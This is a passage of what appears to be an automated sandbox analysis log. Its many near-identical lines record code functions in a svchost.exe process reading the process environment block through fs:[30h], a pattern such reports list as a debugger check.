                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h] 2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h] 2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h] 2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h] 2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h] 2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h] 2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h] 2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h] 2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0380634F mov eax, dword ptr fs:[00000030h] 2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h] 2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h] 2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h] 2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h] 2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h] 2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h] 2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h] 2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h] 2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h] 2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h] 2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h] 2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h] 2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h] 2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h] 2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h] 2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h] 2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h] 2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h] 2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0380625D mov eax, dword ptr fs:[00000030h] 2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h] 2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h] 2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h] 2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h] 2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h] 2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h] 2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h] 2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h] 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h] 2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h] 2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h] 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h] 2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h] 2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h] 2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h] 2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h] 2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h] 2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h] 2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h] 2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h] 2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h] 2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h] 2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h] 2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h] 2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h] 2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h] 2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h] 2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h] 2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h] 2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h] 2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h] 2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h] 2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h] 2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h] 2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h] 2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
